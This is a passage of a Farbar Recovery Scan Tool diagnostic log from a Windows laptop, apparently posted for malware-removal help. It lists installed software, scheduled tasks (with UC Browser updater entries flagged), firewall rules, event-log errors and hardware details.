Mahjongg Dimensions Deluxe (HKLM-x32\...\WTA-7b04a5a6-c8d9-4b2b-83da-69b3a5557886) (Version: 2.2.0.95 - WildTangent) Hidden
Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{45898170-E68C-4F02-AA35-C2186BF347A3}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{B39A6825-EA20-43EA-AB2D-A6BC0298D9A1}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 40.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 40.0.3 (x86 en-US)) (Version: 40.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0.3 - Mozilla)
Mystery P.I. - Curious Case of Counterfeit Cove (HKLM-x32\...\WTA-c2cfafbe-4ca2-4be5-80eb-feac17908e28) (Version: 2.2.0.98 - WildTangent) Hidden
Opera Stable 48.0.2685.39 (HKLM-x32\...\Opera 48.0.2685.39) (Version: 48.0.2685.39 - Opera Software)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM-x32\...\{90150000-001F-040C-0000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
Peggle Nights (HKLM-x32\...\WTA-51104e8b-419d-4661-a1d7-2ac84b9a7931) (Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (HKLM-x32\...\WTA-0eb7a9d1-0bd7-4297-8595-2442d002c333) (Version: 2.2.0.98 - WildTangent) Hidden
Pinger (HKLM-x32\...\{9B56B031-A6C0-4BB7-8F61-938548C1B759}) (Version: 1.4.0.1 - Pinger Inc.) Hidden
Pinger (HKLM-x32\...\Pinger 1.4.0.1) (Version: 1.4.0.1 - Pinger Inc.)
Plants vs. Zombies - Game of the Year (HKLM-x32\...\WTA-eb607eec-616d-47d6-9067-4ce2b4f63207) (Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (HKLM-x32\...\WTA-ca882f22-ffce-4139-89bd-db4f9771e198) (Version: 2.2.0.97 - WildTangent) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29075 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 8.24.1218.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7156 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.00.13.1216 - REALTEK Semiconductor Corp.)
Roads of Rome 3 (HKLM-x32\...\WTA-1dba3fbf-1ffa-49b0-8493-c2fb6d845670) (Version: 2.2.0.98 - WildTangent) Hidden
Speccy (HKLM\...\Speccy) (Version: 1.30 - Piriform)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.0.4.0 - Synaptics Incorporated)
Tales of Lagoona (HKLM-x32\...\WTA-9f3f6591-d18d-4edc-b944-52a2309f311b) (Version: 2.2.0.110 - WildTangent) Hidden
TeraCopy 2.27 (HKLM\...\TeraCopy_is1) (Version:  - Code Sector)
UC Browser (HKLM-x32\...\UCBrowser) (Version: 5.2.1369.1410 - UCWeb Inc.)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden
USB Disk Storage Format Tool 5.3 (HKLM\...\USB Disk Storage Format Tool_is1) (Version:  - Authorsoft Corporation)
Vacation Quest™ - Australia (HKLM-x32\...\WTA-50a84edc-6d7b-42ef-a96f-c43f761e4026) (Version: 3.0.2.32 - WildTangent) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.6 - VideoLAN)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App (HP Games) (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-hp) (Version: 4.0.10.15 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Youda Jewel Shop (HKLM-x32\...\WTA-19b97c33-a9f4-4b41-9fe1-23bbfc2a8f90) (Version: 3.0.2.32 - WildTangent) Hidden
Zuma's Revenge (HKLM-x32\...\WTA-388a67e5-25e7-413f-aa22-b4763a8a2ed7) (Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-19] (Igor Pavlov)
ContextMenuHandlers1: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2013-10-16] (Cyberlink)
ContextMenuHandlers1: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] ()
ContextMenuHandlers1: [TeraCopyS64] -> {A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt64.dll [2011-10-26] ()
ContextMenuHandlers2: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2013-10-16] (Cyberlink)
ContextMenuHandlers2: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] ()
ContextMenuHandlers2: [TeraCopyS64] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] ()
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-19] (Igor Pavlov)
ContextMenuHandlers4: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] ()
ContextMenuHandlers4: [TeraCopyS64] -> {A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt64.dll [2011-10-26] ()
ContextMenuHandlers5: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] ()
ContextMenuHandlers5: [TeraCopyS64] -> {A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt64.dll [2011-10-26] ()
ContextMenuHandlers6: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2011-10-26] ()
ContextMenuHandlers6: [TeraCopyS64] -> {A764EEF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt64.dll [2011-10-26] ()

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {265C3B55-D257-4069-86E9-5176C9653BD8} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2013-03-12] (CyberLink Corp.)
Task: {282BBA58-FB08-4296-9C00-7367AE5F657D} - System32\Tasks\Opera scheduled Autoupdate 1502794694 => C:\Program Files (x86)\Opera\launcher.exe [2017-10-10] (Opera Software)
Task: {33D43503-B402-4F08-BD76-054642F91452} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {3F6E048D-6404-433B-8F5F-CFF4D89BF89E} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe generaltel.dll,RunTelemetryW
Task: {4F71697F-13D7-470D-AF25-92B5590AC54C} - System32\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11} => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2015-06-25] (UCWeb Inc) <==== ATTENTION
Task: {517EB82D-1AF1-4F98-B0C7-7627C442FC36} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-01-13] (Hewlett-Packard Company)
Task: {589AACA5-8971-4F35-9AF5-C47132E47FBA} - System32\Tasks\HPCeeScheduleForVEEVIC => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {59E206AF-91CE-4151-8263-3A5BFD8AB987} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-15] (Google Inc.)
Task: {5F9CED9F-B5C5-40D9-A7BA-9E1FA04D22EE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {62CE07BC-82A6-4FDD-A054-25670BF53DDB} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2013-12-13] (Synaptics Incorporated)
Task: {790D64F4-9BF9-4F04-BFAE-7CF7581D4050} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2013-08-05] (CyberLink)
Task: {7BAE9E83-CCF1-489F-84DF-9D4A0D465579} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {7BB4F040-CB53-4235-9CD5-83F02679CE43} - System32\Tasks\RunSpeccy => C:\Program Files\Speccy\Speccy64.exe [2016-11-18] (Piriform Ltd)
Task: {824038DD-7E90-4EB0-B296-EC40F919D08C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-01-13] (Hewlett-Packard Company)
Task: {8344F1BA-3DA3-4E06-8252-47A1A8B4677F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-15] (Google Inc.)
Task: {8612EE67-D52F-44A5-A719-D8B7217ABB53} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-03-07] (CyberLink Corp.)
Task: {AFDEF45A-8C35-450B-BF04-142AFAD9F530} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe
Task: {AFF076E1-F9E6-442B-8EAB-3A381C16EAD0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFReport.exe [2016-02-18] (Hewlett-Packard)
Task: {B061312A-CEA3-4E5F-B127-E5C99E45C105} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-09-15] (HP Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForVEEVIC.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: C:\WINDOWS\Tasks\UCBrowserUpdater{e23df38b34103b001ee4a910a2610d11}.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2015-07-10 12:00 - 2015-07-10 12:00 - 000032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2014-03-28 21:31 - 2014-03-28 21:31 - 002110464 _____ () C:\Program Files\Hewlett-Packard\SimplePass\autheng.dll
2014-03-28 21:27 - 2014-03-28 21:27 - 000035328 _____ () C:\Program Files\Hewlett-Packard\SimplePass\ssplogon.dll
2014-03-28 21:27 - 2014-03-28 21:27 - 000021504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cryptodll.dll
2014-03-28 21:27 - 2014-03-28 21:27 - 000055296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\RandomPass.dll
2014-03-28 21:48 - 2014-03-28 21:48 - 000367504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\mstrpwd.dll
2014-03-28 21:48 - 2014-03-28 21:48 - 000712080 _____ () C:\Program Files\Hewlett-Packard\SimplePass\GraphicalPwd.dll
2015-07-10 11:59 - 2015-07-10 11:59 - 000403968 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2017-08-15 12:02 - 2015-06-25 13:14 - 000713552 _____ () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
2017-09-16 14:29 - 2014-09-11 02:29 - 000236544 _____ () C:\app\Veevic\product\12.1.0\dbhome_1\bin\orawsec12.dll
2017-09-16 14:38 - 2014-09-11 02:27 - 000208896 _____ () c:\app\veevic\product\12.1.0\dbhome_1\bin\OraVSSW.exe
2015-07-10 12:00 - 2015-07-10 12:00 - 002498296 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2012-10-01 20:34 - 2012-10-01 20:34 - 006522480 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2017-08-15 12:01 - 2011-10-26 17:41 - 000318976 _____ () C:\Program Files\TeraCopy\TeraCopyExt64.dll
2015-07-10 11:59 - 2015-07-10 11:59 - 000429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-10 12:00 - 2015-07-10 14:14 - 006579712 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-07-10 12:00 - 2015-07-10 14:14 - 000471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-07-10 12:00 - 2015-07-10 14:14 - 002274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2014-03-28 21:36 - 2014-03-28 21:36 - 000065024 _____ () C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
2013-08-10 07:11 - 2013-08-10 07:11 - 000607744 _____ () C:\WINDOWS\system32\spool\DRIVERS\x64\3\JobCapsA.DLL
2014-06-09 06:37 - 2013-08-05 08:49 - 000627672 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2013-08-05 23:48 - 2013-08-05 23:48 - 000016856 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 14:25 - 2013-08-22 14:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-133669981-2456230652-2001851347-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\VEEVIC\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.43.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{50388594-55C5-4943-9124-8F6DC7DDE47D}] => (Allow) C:\Program Files (x86)\Opera\42.0.2393.137\opera.exe
FirewallRules: [{A7FCD548-EBE4-40E1-B0FC-63310CF96E5F}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{A47441DD-55B5-48CE-B26D-B0492CC03787}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{FAC401B5-357D-4BD7-86F5-31AA49D77C3D}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{7A79A445-09D2-48D0-86DE-F00F9D1A836C}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{CBF5125D-8C2A-4F5C-9159-85795B137B14}] => (Allow) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
FirewallRules: [{5FC983BB-1D7A-4389-9B99-E882AD4B15DE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8E7A2A89-CC3C-4F95-BEE1-5DCA64FDD1F0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CEFB8085-0807-4D85-94F6-8660C6FF8A4F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{807E93B1-92C0-477A-B06D-47C188DED5E0}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{F7386F72-6ECE-4396-AF34-9D7832C4D9CA}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{AEB2D8E7-AADB-44C0-8B63-1CCC62641F8C}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe
FirewallRules: [{DA38251A-2140-49CC-830A-5502BEA4026D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{18E0C272-1885-405A-8BF8-7714CA6E305E}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe
FirewallRules: [{192CB29A-3452-4ADA-B927-A65A53763636}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{4A32C5EF-091A-49BE-B2A3-0FC7E9FB3943}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{3F62D227-8D97-49AF-8968-D0F2F7AD91CB}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{B217C35C-A1AA-4A26-9137-2CDB11EECC48}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{9123095D-D294-47F6-A81A-FB48B206FEA5}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{07B53F67-46E0-4E8A-A484-DAFDA9505FCA}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{2463C116-69ED-4493-B48B-6631FEF17770}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{819306FA-D122-44F5-A748-CC1307C44A50}] => (Allow) LPort=1900
FirewallRules: [{F82BB814-FD51-4987-A33F-250BD832B780}] => (Allow) LPort=2869
FirewallRules: [{48E95D83-9B8B-414B-A9A7-2AFD0BA50208}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [TCP Query User{87DC3BC2-E08F-47AC-B55E-6E05A2338D2D}C:\users\veevic\appdata\local\temp\orainstall2017-09-16_02-13-11pm\jdk\jre\bin\javaw.exe] => (Allow) C:\users\veevic\appdata\local\temp\orainstall2017-09-16_02-13-11pm\jdk\jre\bin\javaw.exe
FirewallRules: [UDP Query User{D50D1D10-FCE4-4A73-B382-E287B339BBD6}C:\users\veevic\appdata\local\temp\orainstall2017-09-16_02-13-11pm\jdk\jre\bin\javaw.exe] => (Allow) C:\users\veevic\appdata\local\temp\orainstall2017-09-16_02-13-11pm\jdk\jre\bin\javaw.exe
FirewallRules: [TCP Query User{C5D48360-82B7-45E6-8C6A-B1D7DBA2F44F}C:\app\veevic\product\12.1.0\dbhome_1\jdk\jre\bin\java.exe] => (Allow) C:\app\veevic\product\12.1.0\dbhome_1\jdk\jre\bin\java.exe
FirewallRules: [UDP Query User{BD719DFB-4956-4AC1-8A85-487F1EB27A65}C:\app\veevic\product\12.1.0\dbhome_1\jdk\jre\bin\java.exe] => (Allow) C:\app\veevic\product\12.1.0\dbhome_1\jdk\jre\bin\java.exe
FirewallRules: [{F6ED83BC-6104-4C93-AD5D-53A204D47E53}] => (Allow) C:\Program Files (x86)\Opera\48.0.2685.39\opera.exe

==================== Restore Points =========================

29-09-2017 23:10:36 Removed KB4023057
10-10-2017 20:46:07 Scheduled Checkpoint
22-10-2017 02:35:17 Scheduled Checkpoint
22-10-2017 02:58:38 Restore Point Created by FRST

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: HID-compliant touch screen
Description: HID-compliant touch screen
Class Guid: {745a17a0-74d3-11d0-b6fe-00a0c90f57da}
Manufacturer: (Standard system devices)
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (10/22/2017 03:02:45 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegOpenKeyExW(-2147483646,SYSTEM\CurrentControlSet\Services\VSS\Diag,...).  hr = 0x80070005, Access is denied.
.


Operation:
   Initializing Writer

Context:
   Writer Class Id: {26d02976-b909-43ad-af7e-62a4f625e372}
   Writer Name: Oracle VSS Writer - ORCL
   Writer Instance Name: ORCL
   Writer Instance ID: {9852f499-0540-439c-af32-c8fd75d04aa6}

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1500) (User: VICTOR)
Description: Windows cannot log you on because your profile cannot be loaded. Check that you are connected to the network, and that your network is functioning correctly.

 DETAIL - The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: VICTOR)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1500) (User: VICTOR)
Description: Windows cannot log you on because your profile cannot be loaded. Check that you are connected to the network, and that your network is functioning correctly.

 DETAIL - The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: VICTOR)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1500) (User: VICTOR)
Description: Windows cannot log you on because your profile cannot be loaded. Check that you are connected to the network, and that your network is functioning correctly.

 DETAIL - The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: VICTOR)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1500) (User: VICTOR)
Description: Windows cannot log you on because your profile cannot be loaded. Check that you are connected to the network, and that your network is functioning correctly.

 DETAIL - The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: VICTOR)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (10/22/2017 02:58:39 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.


System errors:
=============
Error: (10/22/2017 03:06:09 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {784E29F4-5EBE-4279-9948-1E8FE941646D} did not register with DCOM within the required timeout.

Error: (10/22/2017 03:02:40 AM) (Source: Service Control Manager) (EventID: 7005) (User: )
Description: The LoadUserProfile call failed with the following error:
The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Service Control Manager) (EventID: 7005) (User: )
Description: The LoadUserProfile call failed with the following error:
The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Service Control Manager) (EventID: 7005) (User: )
Description: The LoadUserProfile call failed with the following error:
The system cannot find the file specified.

Error: (10/22/2017 03:02:40 AM) (Source: Service Control Manager) (EventID: 7005) (User: )
Description: The LoadUserProfile call failed with the following error:
The system cannot find the file specified.

Error: (10/22/2017 03:01:46 AM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: The Delivery Optimization service did not shut down properly after receiving a preshutdown control.

Error: (10/22/2017 03:00:40 AM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: The Diagnostics Tracking Service service did not shut down properly after receiving a preshutdown control.

Error: (10/22/2017 03:00:07 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session1 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (10/22/2017 02:58:53 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The OracleServiceORCL service terminated unexpectedly.  It has done this 1 time(s).

Error: (10/22/2017 02:58:52 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HP Software Framework Service service terminated unexpectedly.  It has done this 1 time(s).


CodeIntegrity:
===================================
  Date: 2017-10-21 16:01:41.240
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-09-16 15:23:08.576
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-09-10 05:05:48.193
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: Intel® Core™ i3-4010U CPU @ 1.70GHz
Percentage of memory in use: 55%
Total physical RAM: 4027.84 MB
